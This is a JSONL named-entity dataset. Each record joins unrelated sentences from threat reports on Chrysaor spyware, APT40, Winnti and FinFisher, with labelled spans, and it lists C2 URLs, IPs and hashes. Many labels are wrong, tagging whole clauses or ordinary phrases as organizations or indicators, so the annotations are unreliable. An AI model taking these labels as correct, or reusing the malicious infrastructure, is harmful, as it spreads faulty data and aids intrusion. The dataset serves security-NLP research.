{"text": "Verify Apps : Ensure Verify Apps is enabled . Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe . The actual malicious payload is quite small and only contains about 17 KB of code and data . Mandiant identified a second sample on VirusTotal with the same self - signed certificate CN .", "spans": [{"start": 80, "end": 85, "label": "Organization"}, {"start": 116, "end": 135, "label": "Organization"}, {"start": 138, "end": 163, "label": "Organization"}, {"start": 181, "end": 202, "label": "Organization"}, {"start": 377, "end": 387, "label": "System"}]}
{"text": "Locate your device : Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA . Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe . The configuration data is simply a whitespace-separated list of strings . Other actors merged into this group : 1 UNC2529 is a well - resourced and experienced group that has targeted multiple organizations across numerous industries in a global phishing campaign .", "spans": [{"start": 55, "end": 77, "label": "System"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 224, "end": 243, "label": "Organization"}, {"start": 246, "end": 271, "label": "Organization"}, {"start": 289, "end": 310, "label": "Organization"}, {"start": 467, "end": 474, "label": "Organization"}, {"start": 480, "end": 586, "label": "Organization"}, {"start": 592, "end": 616, "label": "Organization"}]}
{"text": "How does Chrysaor work ? On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . The configuration consists of four fields : This incident and last year \u2019s INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features .", "spans": [{"start": 9, "end": 17, "label": "Malware"}, {"start": 57, "end": 67, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 141, "end": 161, "label": "Organization"}, {"start": 203, "end": 211, "label": "Organization"}, {"start": 294, "end": 308, "label": "Malware"}, {"start": 350, "end": 372, "label": "Organization"}]}
{"text": "To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . C&C server URL . New technologies are constantly introduced within the industry , and healthcare has experienced a rapid transition to use of connected devices , which puts stress on security teams to keep up .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 167, "end": 180, "label": "Vulnerability"}, {"start": 371, "end": 415, "label": "Vulnerability"}, {"start": 429, "end": 464, "label": "Vulnerability"}]}
{"text": "Once Chrysaor is installed , a remote operator is able to surveil the victim 's activities on the device and within the vicinity , leveraging microphone , camera , data collection , and logging and tracking application activities on communication apps such as phone and SMS . Some of the documents exploited CVE-2017-0199 to deliver the payload . Variable ( t ) used to determine the time to sleep in milliseconds before continuing the execution . However , com.docker.vmnat was removed from the system .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 288, "end": 297, "label": "Malware"}, {"start": 308, "end": 321, "label": "Vulnerability"}, {"start": 325, "end": 344, "label": "Malware"}, {"start": 458, "end": 502, "label": "Indicator"}]}
{"text": "One representative sample Chrysaor app that we analyzed was tailored to devices running Jellybean ( 4.3 ) or earlier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . Wait time is chosen randomly in the range 2/3 t to 5/3 . The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": [{"start": 26, "end": 34, "label": "Malware"}, {"start": 88, "end": 105, "label": "System"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 248, "end": 267, "label": "Organization"}, {"start": 331, "end": 343, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 426, "end": 444, "label": "Organization"}]}
{"text": "The following is a review of scope and impact of the Chrysaor app named com.network.android tailored for a Samsung device target , with SHA256 digest : ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5Upon installation , the app uses known framaroot exploits to escalate privileges and break Android 's application sandbox . Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors . A string identifying a campaign . Systems are compromised to enable them to then attack other systems .", "spans": [{"start": 53, "end": 61, "label": "Malware"}, {"start": 72, "end": 91, "label": "Indicator"}, {"start": 107, "end": 114, "label": "Organization"}, {"start": 152, "end": 220, "label": "Indicator"}, {"start": 307, "end": 314, "label": "System"}, {"start": 369, "end": 378, "label": "Organization"}, {"start": 473, "end": 492, "label": "Organization"}]}
{"text": "If the targeted device is not vulnerable to these exploits , then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period . A semicolon-separated list of executable filenames . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": [{"start": 127, "end": 138, "label": "Indicator"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 200, "end": 236, "label": "Malware"}, {"start": 269, "end": 294, "label": "Organization"}, {"start": 369, "end": 381, "label": "Malware"}, {"start": 407, "end": 429, "label": "Malware"}]}
{"text": "After escalating privileges , the app immediately protects itself and starts to collect data , by : Installing itself on the /system partition to persist across factory resets Removing Samsung 's system update app ( com.sec.android.fotaclient ) and disabling auto-updates to maintain persistence ( sets Settings.System.SOFTWARE_UPDATE_AUTO_UPDATE to 0 ) Deleting WAP push messages and changing WAP message settings , possibly for anti-forensic purpose . The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor . If any of them are running , the backdoor stops its execution . Identifying suspicious login patterns based on NetScaler logs", "spans": [{"start": 185, "end": 192, "label": "Organization"}, {"start": 216, "end": 242, "label": "Indicator"}, {"start": 303, "end": 351, "label": "Indicator"}, {"start": 549, "end": 559, "label": "Organization"}, {"start": 610, "end": 615, "label": "Organization"}]}
{"text": "Starting content observers and the main task loop to receive remote commands and exfiltrate data The app uses six techniques to collect user data : Repeated commands : use alarms to periodically repeat actions on the device to expose data , including gathering location data . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 . ESET researchers have identified five versions of the payload : At that time , Symantec observed the attackers breaching Saudi Arabian IT providers in an apparent supply chain attack designed to infect the customers with malware known as Syskit .", "spans": [{"start": 281, "end": 290, "label": "Organization"}, {"start": 381, "end": 389, "label": "Organization"}, {"start": 435, "end": 439, "label": "Organization"}, {"start": 514, "end": 522, "label": "Organization"}, {"start": 536, "end": 545, "label": "Organization"}, {"start": 556, "end": 582, "label": "Organization"}, {"start": 673, "end": 679, "label": "Malware"}]}
{"text": "Data collectors : dump all existing content on the device into a queue . This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 . Winnti : a045939f 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php . The file \u2019s name consists of six randomly - generated alphanumeric characters .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 174, "end": 182, "label": "Organization"}, {"start": 228, "end": 234, "label": "Organization"}, {"start": 266, "end": 329, "label": "Indicator"}, {"start": 332, "end": 411, "label": "Indicator"}]}
{"text": "Data collectors are used in conjunction with repeated commands to collect user data including , SMS settings , SMS messages , Call logs , Browser History , Calendar , Contacts , Emails , and messages from selected messaging apps , including WhatsApp , Twitter , Facebook , Kakoa , Viber , and Skype by making /data/data directories of the apps world readable . The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope . Winnti : a260dcf1 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php . Command - line execution of MicroSCADA \u201c Scilc.exe \u201d binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program / commands .", "spans": [{"start": 241, "end": 249, "label": "System"}, {"start": 252, "end": 259, "label": "System"}, {"start": 262, "end": 270, "label": "System"}, {"start": 273, "end": 278, "label": "System"}, {"start": 281, "end": 286, "label": "System"}, {"start": 293, "end": 298, "label": "System"}, {"start": 389, "end": 394, "label": "Organization"}, {"start": 416, "end": 438, "label": "Organization"}, {"start": 475, "end": 489, "label": "Organization"}, {"start": 492, "end": 498, "label": "Organization"}, {"start": 530, "end": 596, "label": "Indicator"}]}
{"text": "Content observers : use Android 's ContentObserver framework to gather changes in SMS , Calendar , Contacts , Cell info , Email , WhatsApp , Facebook , Twitter , Kakao , Viber , and Skype . The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy . Winnti : dde82093 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/common.php . As we 've discussed recently , there has been huge growth in the ransomware and extortion space , potentially linked to the plethora of leaked builders and source code related to various ransomware cartels .", "spans": [{"start": 24, "end": 31, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 88, "end": 96, "label": "System"}, {"start": 99, "end": 107, "label": "System"}, {"start": 110, "end": 119, "label": "System"}, {"start": 122, "end": 127, "label": "System"}, {"start": 130, "end": 138, "label": "System"}, {"start": 141, "end": 149, "label": "System"}, {"start": 152, "end": 159, "label": "System"}, {"start": 162, "end": 167, "label": "System"}, {"start": 170, "end": 175, "label": "System"}, {"start": 182, "end": 187, "label": "System"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 276, "end": 288, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}, {"start": 346, "end": 350, "label": "Organization"}, {"start": 353, "end": 359, "label": "Organization"}, {"start": 391, "end": 449, "label": "Indicator"}]}
{"text": "Screenshots : captures an image of the current screen via the raw frame buffer . The current campaign is a sharp escalation of detected activity since summer 2017 . Winnti : 44260a1d 2018-08-15 10:59:09 https://dump.gxxservice.com/common/up/up_base.php . The group also engaged in the theft of digital certificates which they then used to sign their malware to make them stealthier .", "spans": [{"start": 165, "end": 171, "label": "Organization"}, {"start": 203, "end": 252, "label": "Indicator"}]}
{"text": "Keylogging : record input events by hooking IPCThreadState : :Transact from /system/lib/libbinder.so , and intercepting android : :parcel with the interface com.android.internal.view.IInputContext . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues . Winnti : 8272c1f4 2018-11-01 13:16:24 https://nw.infestexe.com/version/last.php . The Platform can look for indicators across file attachments , embedded links , and more and provide inplatform risk scoring .", "spans": [{"start": 76, "end": 100, "label": "Indicator"}, {"start": 120, "end": 137, "label": "Indicator"}, {"start": 157, "end": 196, "label": "Indicator"}, {"start": 218, "end": 225, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}, {"start": 274, "end": 293, "label": "Organization"}, {"start": 300, "end": 319, "label": "Organization"}, {"start": 386, "end": 397, "label": "Organization"}, {"start": 402, "end": 419, "label": "Organization"}, {"start": 477, "end": 483, "label": "Organization"}, {"start": 515, "end": 556, "label": "Indicator"}, {"start": 559, "end": 571, "label": "System"}, {"start": 585, "end": 636, "label": "Indicator"}]}
{"text": "RoomTap : silently answers a telephone call and stays connected in the background , allowing the caller to hear conversations within the range of the phone 's microphone . Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States . In the first three variants , the code was not recompiled , but the configuration data was edited in the DLL file itself . Once an actor was able to successfully achieve session hijacking , the threat actor performed actions including host and network reconnaissance of the victim environment , credential harvesting , and lateral movement via RDP .", "spans": [{"start": 193, "end": 202, "label": "Organization"}, {"start": 229, "end": 246, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}, {"start": 275, "end": 297, "label": "Organization"}, {"start": 304, "end": 317, "label": "Organization"}, {"start": 446, "end": 449, "label": "System"}]}
{"text": "If the user unlocks their device , they will see a black screen while the app drops the call , resets call settings and prepares for the user to interact with the device normally . Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . The rest of the content is a byte for byte copy . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 210, "end": 224, "label": "Organization"}, {"start": 313, "end": 330, "label": "Organization"}, {"start": 333, "end": 341, "label": "Organization"}, {"start": 346, "end": 360, "label": "Organization"}, {"start": 363, "end": 376, "label": "Organization"}, {"start": 379, "end": 386, "label": "Organization"}, {"start": 389, "end": 407, "label": "Organization"}, {"start": 414, "end": 435, "label": "Organization"}, {"start": 573, "end": 582, "label": "Organization"}]}
{"text": "Finally , the app can remove itself through three ways : Via a command from the server Autoremove if the device has not been able to check in to the server after 60 days Via an antidote file . TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu . Domain names were carefully chosen to look like they are related to the game or application publisher . When the malware is executed , it attempts to run the following commands , most of which attempt to stop various security and backup related software", "spans": [{"start": 193, "end": 207, "label": "Organization"}, {"start": 297, "end": 308, "label": "Organization"}, {"start": 313, "end": 318, "label": "Organization"}, {"start": 377, "end": 386, "label": "System"}, {"start": 502, "end": 509, "label": "Malware"}]}
{"text": "If /sdcard/MemosForNotes was present on the device , the Chrysaor app removes itself from the device . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort . The apex domain was set to redirect to a relevant legitimate site using the Namecheap redirection service , while the subdomain points to the malicious C&C server . None The motives have not yet been definitively determined , but are guessed to be the result of a oneoff attempt to gather intelligence that potentially can be used in further phishing campaigns .", "spans": [{"start": 3, "end": 24, "label": "Indicator"}, {"start": 57, "end": 65, "label": "Malware"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 286, "end": 295, "label": "System"}]}
{"text": "Samples uploaded to VirusTotal To encourage further research in the security community , we \u2019 ve uploaded these sample Chrysaor apps to Virus Total . FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 . Winnti : xigncodeservice.com 2018-07-10 09:18:17 https://namu.wiki/w/XIGNCODE . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload \u2022 None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": [{"start": 20, "end": 30, "label": "Organization"}, {"start": 119, "end": 127, "label": "Malware"}, {"start": 136, "end": 147, "label": "Organization"}, {"start": 150, "end": 157, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 327, "end": 333, "label": "Organization"}, {"start": 336, "end": 355, "label": "Indicator"}, {"start": 376, "end": 404, "label": "Indicator"}, {"start": 536, "end": 678, "label": "Indicator"}]}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.network.android 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 516f8f516cc0fd8db53785a48c0a86554f75c3ba The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies . Winnti : gxxservice.com 2018-08-14 13:53:41 None or unknown . The initial beacon contains hardcoded string added to IP parameters .", "spans": [{"start": 44, "end": 63, "label": "Indicator"}, {"start": 64, "end": 128, "label": "Indicator"}, {"start": 129, "end": 169, "label": "Indicator"}, {"start": 170, "end": 189, "label": "Indicator"}, {"start": 190, "end": 254, "label": "Indicator"}, {"start": 255, "end": 295, "label": "Indicator"}, {"start": 300, "end": 315, "label": "Organization"}, {"start": 342, "end": 353, "label": "Organization"}, {"start": 356, "end": 370, "label": "Organization"}, {"start": 381, "end": 397, "label": "Organization"}, {"start": 468, "end": 474, "label": "Organization"}, {"start": 477, "end": 491, "label": "Indicator"}, {"start": 530, "end": 597, "label": "Malware"}]}
{"text": "Additional digests with links to Chrysaor As a result of our investigation we have identified these additional Chrysaor-related apps . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy . Winnti : infestexe.com 2018-11-07 08:46:44 https://www.facebook.com/infest.in.th . \u2022 Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": [{"start": 33, "end": 41, "label": "Malware"}, {"start": 111, "end": 127, "label": "Malware"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 187, "end": 203, "label": "Organization"}, {"start": 274, "end": 280, "label": "Organization"}, {"start": 283, "end": 296, "label": "Indicator"}, {"start": 317, "end": 354, "label": "Indicator"}, {"start": 359, "end": 466, "label": "Indicator"}]}
{"text": "Package Name SHA256 digest SHA1 certificate com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . Winnti : bugcheck.xigncodeservice.com 167.99.106.49 , 178.128.180.206 DigitalOcean . In September , the Department of the Treasury issued an advisory strongly discouraging consumers and organizations from making payments based on extortion attempts and encouraging them to strengthen their defense measures .", "spans": [{"start": 44, "end": 63, "label": "Indicator"}, {"start": 64, "end": 128, "label": "Indicator"}, {"start": 129, "end": 169, "label": "Indicator"}, {"start": 170, "end": 189, "label": "Indicator"}, {"start": 190, "end": 254, "label": "Indicator"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 339, "end": 351, "label": "Organization"}, {"start": 380, "end": 386, "label": "Organization"}, {"start": 389, "end": 417, "label": "Indicator"}, {"start": 418, "end": 431, "label": "Indicator"}, {"start": 434, "end": 449, "label": "Indicator"}, {"start": 450, "end": 462, "label": "Organization"}, {"start": 484, "end": 510, "label": "Organization"}]}
{"text": "44f6d1caa257799e57f0ecaf4e2e216178f4cb3d com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . Winnti : dump.gxxservice.com 142.93.204.230 DigitalOcean . An attacker may have more than a single motivation to target a particular organization .", "spans": [{"start": 0, "end": 40, "label": "Indicator"}, {"start": 41, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 170, "label": "Indicator"}, {"start": 171, "end": 187, "label": "Indicator"}, {"start": 188, "end": 252, "label": "Indicator"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 401, "end": 407, "label": "Organization"}, {"start": 410, "end": 429, "label": "Indicator"}, {"start": 430, "end": 444, "label": "Indicator"}, {"start": 445, "end": 457, "label": "Organization"}, {"start": 460, "end": 471, "label": "Organization"}, {"start": 521, "end": 546, "label": "Organization"}]}
{"text": "7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation . Winnti : nw.infestexe.com 138.68.14.195 DigitalOcean . While there are several motivations for hackers , we ve covered 6 of the most common ones in this article", "spans": [{"start": 0, "end": 40, "label": "Indicator"}, {"start": 41, "end": 57, "label": "Indicator"}, {"start": 58, "end": 122, "label": "Indicator"}, {"start": 123, "end": 163, "label": "Indicator"}, {"start": 164, "end": 180, "label": "Indicator"}, {"start": 181, "end": 245, "label": "Indicator"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 349, "end": 355, "label": "Organization"}, {"start": 358, "end": 374, "label": "Indicator"}, {"start": 375, "end": 388, "label": "Indicator"}, {"start": 389, "end": 401, "label": "Organization"}, {"start": 444, "end": 451, "label": "Organization"}]}
{"text": "31a8633c2cd67ae965524d0b2192e9f14d04d016 FinFisher exposed : A researcher \u2019 s tale of defeating traps , tricks , and complex virtual machines March 1 , 2018 Office 365 Advanced Threat Protection ( Office 365 ATP ) blocked many notable zero-day exploits in 2017 . The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China . At the time of writing , none of the domains resolve and the C&C servers are not responding . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 0, "end": 40, "label": "Indicator"}, {"start": 41, "end": 50, "label": "Malware"}, {"start": 157, "end": 194, "label": "System"}, {"start": 197, "end": 211, "label": "System"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 534, "end": 694, "label": "Malware"}]}
{"text": "In our analysis , one activity group stood out : NEODYMIUM . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard Time ( UTC +8 ) . A bot identifier is generated from the machine\u2019s MAC address . In an article for DarkReading , Ericka Chickowski highlights 15 key indicators of compromise", "spans": [{"start": 49, "end": 58, "label": "Malware"}, {"start": 102, "end": 107, "label": "Organization"}, {"start": 282, "end": 293, "label": "Organization"}, {"start": 296, "end": 313, "label": "Organization"}]}
{"text": "This threat actor is remarkable for two reasons : Its access to sophisticated zero-day exploits for Microsoft and Adobe software Its use of an advanced piece of government-grade surveillance spyware FinFisher , also known as FinSpy and detected by Microsoft security products as Wingbird FinFisher is such a complex piece of malware that , like other researchers , we had to devise special methods to crack it . APT40 relies heavily on web shells for an initial foothold into an organization . The backdoor reports information about the machine such as the user name , computer name , Windows version and system language to the C&C server and awaits commands . \u2022 Cisco Talos has discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": [{"start": 100, "end": 109, "label": "Organization"}, {"start": 114, "end": 119, "label": "Organization"}, {"start": 199, "end": 208, "label": "Malware"}, {"start": 225, "end": 231, "label": "Malware"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 279, "end": 287, "label": "Malware"}, {"start": 288, "end": 297, "label": "Malware"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 436, "end": 446, "label": "System"}, {"start": 585, "end": 592, "label": "System"}, {"start": 663, "end": 674, "label": "Organization"}, {"start": 716, "end": 733, "label": "Organization"}, {"start": 742, "end": 761, "label": "Organization"}, {"start": 764, "end": 786, "label": "Organization"}, {"start": 791, "end": 805, "label": "Organization"}]}
{"text": "We needed to do this to understand the techniques FinFisher uses to compromise and persist on a machine , and to validate the effectiveness of Office 365 ATP detonation sandbox , Windows Defender Advanced Threat Protection ( Windows Defender ATP ) generic detections , and other Microsoft security solutions . APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises . The data is XOR encrypted with the key \u201c *&b0i0rong2Y7un1 \u201d and base64-encoded . In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": [{"start": 50, "end": 59, "label": "Malware"}, {"start": 143, "end": 157, "label": "System"}, {"start": 179, "end": 222, "label": "System"}, {"start": 225, "end": 245, "label": "System"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 546, "end": 549, "label": "System"}, {"start": 630, "end": 641, "label": "Organization"}, {"start": 725, "end": 741, "label": "Vulnerability"}]}
{"text": "This task proved to be nontrivial . Depending on placement , a web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement . The data received from the C&C server is encrypted using the same key . As outlined in recent research detailing the GRU 's disruptive playbook , we have observed Sandworm adopting LotL tactics across its wider operations to similarly increase the speed and scale at which it can operate while minimizing the odds of detection .", "spans": [{"start": 77, "end": 101, "label": "Malware"}, {"start": 130, "end": 154, "label": "Malware"}, {"start": 161, "end": 188, "label": "Malware"}, {"start": 308, "end": 334, "label": "Organization"}, {"start": 354, "end": 362, "label": "Organization"}, {"start": 426, "end": 517, "label": "Indicator"}]}
{"text": "FinFisher is not afraid of using all kinds of tricks , ranging from junk instructions and \u201c spaghetti code \u201d to multiple layers of virtual machines and several known and lesser-known anti-debug and defensive measures . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . This simple backdoor has only four commands that can be used by the attacker : In the listed indicators of compromise , we noticed domains that we had seen used in a distinct skimming campaign which did n't seem to be documented yet .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 223, "end": 228, "label": "Organization"}, {"start": 278, "end": 291, "label": "Vulnerability"}, {"start": 420, "end": 444, "label": "Indicator"}, {"start": 458, "end": 519, "label": "Indicator"}]}
{"text": "Security analysts are typically equipped with the tools to defeat a good number of similar tricks during malware investigations . A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\\u2026 \" . DownUrlFile DownRunUrlFile RunUrlBinInMem UnInstall . All companies are subject to these .", "spans": [{"start": 174, "end": 192, "label": "Organization"}, {"start": 343, "end": 348, "label": "System"}, {"start": 474, "end": 483, "label": "Organization"}]}
{"text": "However , FinFisher is in a different category of malware for the level of its anti-analysis protection . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . The commands are pretty much self-explanatory . This indicates that the threat actor is likely capable of quickly developing similar capabilities against other OT systems from different original equipment manufacturers ( OEMs ) leveraged across the world .", "spans": [{"start": 10, "end": 19, "label": "Malware"}, {"start": 120, "end": 139, "label": "Organization"}, {"start": 166, "end": 185, "label": "Vulnerability"}, {"start": 316, "end": 328, "label": "Organization"}, {"start": 404, "end": 414, "label": "System"}, {"start": 430, "end": 462, "label": "System"}]}
{"text": "It \u2019 s a complicated puzzle that can be solved by skilled reverse engineers only with good amount of time , code , automation , and creativity . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . They allow the attacker to run additional executables from a given URL . We found roughly 500 domain names that lead or have led to the \u201c Pig network \u201d between 2015 to March 2017 .", "spans": [{"start": 149, "end": 154, "label": "Organization"}, {"start": 186, "end": 198, "label": "Vulnerability"}, {"start": 201, "end": 228, "label": "Vulnerability"}, {"start": 246, "end": 259, "label": "Vulnerability"}, {"start": 260, "end": 273, "label": "Vulnerability"}, {"start": 320, "end": 333, "label": "System"}, {"start": 478, "end": 493, "label": "Organization"}]}
{"text": "The intricate anti-analysis methods reveal how much effort the FinFisher authors exerted to keep the malware hidden and difficult to analyze . The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years . The last one is perhaps less obvious . Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": [{"start": 63, "end": 72, "label": "Malware"}, {"start": 147, "end": 160, "label": "Organization"}, {"start": 221, "end": 253, "label": "Organization"}, {"start": 366, "end": 378, "label": "Malware"}, {"start": 434, "end": 441, "label": "Malware"}, {"start": 529, "end": 536, "label": "Malware"}]}
{"text": "This exercise revealed tons of information about techniques used by FinFisher that we used to make Office 365 ATP more resistant to sandbox detection and Windows Defender ATP to catch similar techniques and generic behaviors . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned . The UnInstall command doesn\u2019t remove the malware from the system . While many statesponsored threat actors engage in spear phishing , ransomware is the preferred weapon of these cybercriminals .", "spans": [{"start": 68, "end": 77, "label": "Malware"}, {"start": 99, "end": 113, "label": "System"}, {"start": 154, "end": 174, "label": "System"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 392, "end": 420, "label": "Organization"}, {"start": 492, "end": 506, "label": "Organization"}]}
{"text": "Using intelligence from our in-depth investigation , Windows Defender ATP can raise alerts for malicious behavior employed by FinFisher ( such as memory injection in persistence ) in different stages of the attack kill chain . Spring Dragon 's infiltration techniques there were not simply spearphish . After all , it is embedded inside a legitimate executable that still needs to run . In late 2021 and 2022 , Cuba ransomware delivered an increasing number of highprofile attacks .", "spans": [{"start": 53, "end": 73, "label": "System"}, {"start": 126, "end": 135, "label": "Malware"}, {"start": 227, "end": 240, "label": "Organization"}, {"start": 411, "end": 426, "label": "Organization"}]}
{"text": "Machine learning in Windows Defender ATP further flags suspicious behaviors observed related to the manipulation of legitimate Windows binaries . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Rather than removing anything , it disables the malicious code by setting the following registry value to 1: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImageFlag . \u201c Who or what is asdfdfsda@asdf.com ? , \u201d Biderman asked , after being sent a list of nine email addresses .", "spans": [{"start": 20, "end": 40, "label": "System"}, {"start": 127, "end": 134, "label": "System"}, {"start": 170, "end": 191, "label": "Malware"}, {"start": 215, "end": 224, "label": "Malware"}, {"start": 285, "end": 290, "label": "System"}, {"start": 293, "end": 303, "label": "Malware"}, {"start": 570, "end": 588, "label": "Organization"}, {"start": 595, "end": 603, "label": "Organization"}]}
{"text": "Figure 1 . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . When the payload is started , the registry value is queried and execution is aborted if set . Instead of compiling a list of threats , this technique looks at what is already on a computer and identifies programs as safe , blocking software that does nt match .", "spans": [{"start": 33, "end": 38, "label": "Organization"}, {"start": 78, "end": 91, "label": "Vulnerability"}, {"start": 115, "end": 128, "label": "Organization"}]}
